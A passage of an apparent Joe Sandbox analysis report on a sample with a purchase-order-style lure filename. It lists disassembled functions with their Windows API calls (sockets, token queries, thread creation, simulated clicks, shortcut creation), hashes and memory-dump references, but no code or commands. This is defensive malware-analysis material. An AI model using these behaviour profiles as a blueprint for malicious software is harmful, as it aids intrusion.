Opcode ID: 43b026e8ddf3c15877f3b5ba52f636104edfffe8d0463ba332f451902e7bfc12
Instruction ID: 56377a556ccba115ed564bfe001a2c8afbd6a1a20169098259664232e43cb080
Opcode Fuzzy Hash: 43b026e8ddf3c15877f3b5ba52f636104edfffe8d0463ba332f451902e7bfc12
Instruction Fuzzy Hash: 3A417E31A04119BBCF159F65C844AEEBB74FF15324F10831BF82996290C739AD90DB9A

Function 0043B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0043B369
PostMessageW.USER32(?,00000201,00000001), ref: 0043B413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0043B41B
PostMessageW.USER32(?,00000202,00000000), ref: 0043B429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0043B431

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: d17ea4044e2045b9c16e98e0df8e21c289d5939ccdd835b3e45b18eb1401e770
Instruction ID: e5f01e0ccbb0feccb883e1297f79fe71a552ab19b66adbfd7133fe0b7bbb2f95
Opcode Fuzzy Hash: d17ea4044e2045b9c16e98e0df8e21c289d5939ccdd835b3e45b18eb1401e770
Instruction Fuzzy Hash: 5731AE7190022DEBDF04CF68DD4DB9E7BB5EB08319F10462AFA21AA2D1C3B49954CB95

Function 00446318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 004050E6: _wcsncpy.LIBCMT ref: 004050FA

GetFileAttributesW.KERNEL32(?,?,?,?,004460C3), ref: 00446369
GetLastError.KERNEL32(?,?,?,004460C3), ref: 00446374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004460C3), ref: 00446388
_wcsrchr.LIBCMT ref: 004463AA

Part of subcall function 00446318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004460C3), ref: 004463E0

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: 75aa4d998ddada8572ea712b4258d5f130d90a0f127b447a506129f3f3888f0c
Instruction ID: e2e5c400610b8dad56117f9b5beb12c84386859fb76420c5d936f92795e9889b
Opcode Fuzzy Hash: 75aa4d998ddada8572ea712b4258d5f130d90a0f127b447a506129f3f3888f0c
Instruction Fuzzy Hash: 6B212630A042145AFB24AE74AC42FEF23ACAF06360F11047FF805C31C1EB6899858A5E

Function 00458B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0045A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0045A84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00458BD3
WSAGetLastError.WSOCK32(00000000), ref: 00458BE2
connect.WSOCK32(00000000,?,00000010), ref: 00458BFE

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: 822bd67af5b21315d4a58d27a51d58b89f2d7ba38396fa916d0a561f55ec1a63
Instruction ID: abb2c2ea28d5de88bdee0dc417e74f9f20a9303d66739d36d785107e4a3282d2
Opcode Fuzzy Hash: 822bd67af5b21315d4a58d27a51d58b89f2d7ba38396fa916d0a561f55ec1a63
Instruction Fuzzy Hash: 5C21DE316002009FCB10AF28C885B7E73A9AF48714F04446EF902AB3D2CF78AC058B69

Function 00458420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00458441
GetForegroundWindow.USER32 ref: 00458458
GetDC.USER32(00000000), ref: 00458494
GetPixel.GDI32(00000000,?,00000003), ref: 004584A0
ReleaseDC.USER32(00000000,00000003), ref: 004584DB

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 932ca161dc75b4b717c601e34a63d21e2026fc438652b47232b146da7129521a
Instruction ID: 8a1256e0aecdf14aa6c4f4beab4c2806aa620a91b813a528773de1c84d1aad7c
Opcode Fuzzy Hash: 932ca161dc75b4b717c601e34a63d21e2026fc438652b47232b146da7129521a
Instruction Fuzzy Hash: 7E21A735A00204AFD700EFA5C945A5EB7E5EF48305F04887DEC49A7252DF74EC04CB54

Function 0041AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041AFE3
SelectObject.GDI32(?,00000000), ref: 0041AFF2
BeginPath.GDI32(?), ref: 0041B009
SelectObject.GDI32(?,00000000), ref: 0041B033

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 7c4a71da7bb7c6b92ed87e99b55654c99fda81b73bae783c331b6063b13b5e52
Instruction ID: a68afc14fff29162dc6faf8435a876086fec7fed57c06213cce97e3b8c98d3b8
Opcode Fuzzy Hash: 7c4a71da7bb7c6b92ed87e99b55654c99fda81b73bae783c331b6063b13b5e52
Instruction Fuzzy Hash: E8216070901305AFDB109F55EC88BDE7B68FB16355F14432BE425962B1C37488968B99

Function 0042217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 004221A9
CreateThread.KERNEL32(?,?,004222DF,00000000,?,?), ref: 004221ED
GetLastError.KERNEL32 ref: 004221F7
_free.LIBCMT ref: 00422200
__dosmaperr.LIBCMT ref: 0042220B

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: fe78e4b33934f2f665193501f35f76f7858f28a7d68122209891d7eb0561a6b8
Instruction ID: c22bb6fff56d961d5c9c29188316b6b7028ddab09764e3de592cdea5f7742925
Opcode Fuzzy Hash: fe78e4b33934f2f665193501f35f76f7858f28a7d68122209891d7eb0561a6b8
Instruction Fuzzy Hash: 79112932304326BF9B10AFA6BD41D6B3798EF00734750042FF91497192DBBA981187A8

Function 00AF18DF Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000008,?,?,00AF15D8,00AF3CBB,?,00AF1D2A,?,?,00000000), ref: 00AF18E4
_free.LIBCMT ref: 00AF1919
_free.LIBCMT ref: 00AF1940
SetLastError.KERNEL32(00000000,?,00AF1D2A,?,?,00000000), ref: 00AF194D
SetLastError.KERNEL32(00000000,?,00AF1D2A,?,?,00000000), ref: 00AF1956

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 38a4149a53f321f512d9ae6ad437c2d61e82cc627f9c69bfbf2bb1d6c7cbd1ca
Instruction ID: d61e0d453e11edba123859c48f7798985bd1dc4ac45245355b21826f96155b17
Opcode Fuzzy Hash: 38a4149a53f321f512d9ae6ad437c2d61e82cc627f9c69bfbf2bb1d6c7cbd1ca
Instruction Fuzzy Hash: 4B01F937200609EBD321B7F46DD5ABB266DDBD13787210125F705E3252FEA58C428191

Function 0043ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0043ABD7
GetLastError.KERNEL32(?,0043A69F,?,?,?), ref: 0043ABE1
GetProcessHeap.KERNEL32(00000008,?,?,0043A69F,?,?,?), ref: 0043ABF0
HeapAlloc.KERNEL32(00000000,?,0043A69F,?,?,?), ref: 0043ABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043AC0E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 1105c51a95b9c4985460d9023d3962ffaa69d09a53960c860975f241e157bdbc
Instruction ID: 9a6f70c041a44a4f9a827da56d6e218984a148510de144741497beb3d206d3d0
Opcode Fuzzy Hash: 1105c51a95b9c4985460d9023d3962ffaa69d09a53960c860975f241e157bdbc
Instruction Fuzzy Hash: D4016970641204BFDB115FA9EC8CDAB3BACFF8A354B10182EF955D32A0DA718C50CB68

Function 0043AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0043AA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0043AA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0043AA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0043AA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0043AAAF

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 005e3d2c3a84d1d8d797b66e4ccb948516923a2946e7af749364c39d3cf5c40b
Instruction ID: 974b26daf64f8dbf61396155943fd57f6b72a90fe55d440549507bfb75707d11
Opcode Fuzzy Hash: 005e3d2c3a84d1d8d797b66e4ccb948516923a2946e7af749364c39d3cf5c40b
Instruction Fuzzy Hash: 91F0AF322412046FEB102FA4AC8CE6B3BACFF4E754F10082EF941C7290DB619C15CB65

Function 0043AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0043AADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0043AAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0043AAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0043AAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0043AB10

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: b3c430549ea03a9ae663836329f0cbd350e6d7a8f5d55abe0fc1a4013e99c131
Instruction ID: 146aa33a93239cb99623a1635ed7780d23d82dc7e0fdc4ba1386104819eb8aef
Opcode Fuzzy Hash: b3c430549ea03a9ae663836329f0cbd350e6d7a8f5d55abe0fc1a4013e99c131
Instruction Fuzzy Hash: A3F04F71641208AFEB110FA4EC8CE6B7B6DFF4A754F10053EFA51C7290DB65AC118B65

Function 00AF3171 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00AF3189

Part of subcall function 00AF2096: HeapFree.KERNEL32(00000000,00000000,?,00AF3208,?,00000000,?,00000000,?,00AF322F,?,00000007,?,?,00AF2697,?), ref: 00AF20AC
Part of subcall function 00AF2096: GetLastError.KERNEL32(?,?,00AF3208,?,00000000,?,00000000,?,00AF322F,?,00000007,?,?,00AF2697,?,?), ref: 00AF20BE

_free.LIBCMT ref: 00AF319B
_free.LIBCMT ref: 00AF31AD
_free.LIBCMT ref: 00AF31BF
_free.LIBCMT ref: 00AF31D1

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 91224d0f344701084b14282d895154bd5e4b87700655219eb368bd5b32300d0a
Instruction ID: 69a04334d1a4ce231e76dd42fddb64d7955c077bf2086db72cca8796ed0dff89
Opcode Fuzzy Hash: 91224d0f344701084b14282d895154bd5e4b87700655219eb368bd5b32300d0a
Instruction Fuzzy Hash: FBF0FF33554208AB8F34EBA8E9C5D7A77E9BA047117944909F649D7701CE70FD808A68

Function 0043EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0043EC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 0043ECAB
MessageBeep.USER32(00000000), ref: 0043ECC3
KillTimer.USER32(?,0000040A), ref: 0043ECDF
EndDialog.USER32(?,00000001), ref: 0043ECF9

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: a4357b5e30fb9fe67f4be092913bd6825b4be062f9c32e96e3c3d0623023620a
Instruction ID: 98597da713e12d6dfb059cec58a8c53e20aa62e351f3c557d6efc3328c67b8a1
Opcode Fuzzy Hash: a4357b5e30fb9fe67f4be092913bd6825b4be062f9c32e96e3c3d0623023620a
Instruction Fuzzy Hash: 28018630901704ABEB245B51DE4EB9A7778FF04705F00196EB543714E1DBF4A945CB48

Function 0041B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0041B0BA
StrokeAndFillPath.GDI32(?,?,0047E680,00000000,?,?,?), ref: 0041B0D6
SelectObject.GDI32(?,00000000), ref: 0041B0E9
DeleteObject.GDI32 ref: 0041B0FC
StrokePath.GDI32(?), ref: 0041B117

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 186640bc092136c8836b36fd74f5553999f6ef9858cf0f45e654f2fc4a48aff1
Instruction ID: 305292cf3701eb74ee210533d413ef74276f9a5688495286bd354ebed6b62e2e
Opcode Fuzzy Hash: 186640bc092136c8836b36fd74f5553999f6ef9858cf0f45e654f2fc4a48aff1
Instruction Fuzzy Hash: F8F01930201204EFCB61AF65EC4CB993F65EB02366F088329E465841F2C7348996DF5C

Function 0044F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0044F2DA
CoCreateInstance.OLE32(0048DA7C,00000000,00000001,0048D8EC,?), ref: 0044F2F2
CoUninitialize.OLE32 ref: 0044F555

Strings

.lnk, xrefs: 0044F28B, 0044F290, 0044F29E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: 91ade7effae80d1e2d402c9abdcdf63e1fab9ea58c5caa222256b2330b8234fe
Instruction ID: 4d7391de075464714a8c3291d240941207e243e8aeb7da400a877c7a430c7a2f
Opcode Fuzzy Hash: 91ade7effae80d1e2d402c9abdcdf63e1fab9ea58c5caa222256b2330b8234fe
Instruction Fuzzy Hash: ACA14DB1504201AFD300EF65C881EAFB7ECEF98318F00492EF55597192EB74EA49CB96

Function 0044E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 0040660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004053B1,?,?,004061FF,?,00000000,00000001,00000000), ref: 0040662F

CoInitialize.OLE32(00000000), ref: 0044E85D
CoCreateInstance.OLE32(0048DA7C,00000000,00000001,0048D8EC,?), ref: 0044E876
CoUninitialize.OLE32 ref: 0044E893

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

Strings

.lnk, xrefs: 0044E83B, 0044E84D

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: fbc0b71fd5f665683a4e855e2ddef57b2edea624eeed6b908bef03ecdca15a51
Instruction ID: 10c43b87b23ce4038536d43f928ead2d0a8ecdf508b023c31232c5178fa219cf
Opcode Fuzzy Hash: fbc0b71fd5f665683a4e855e2ddef57b2edea624eeed6b908bef03ecdca15a51
Instruction Fuzzy Hash: 7EA166756043019FDB10EF25C48491EBBE5BF88314F14895EF996AB3A2CB35EC45CB85

Function 0042325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004232ED

Part of subcall function 0042E0D0: __87except.LIBCMT ref: 0042E10B

Strings

pow, xrefs: 004232C5, 004232E2

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
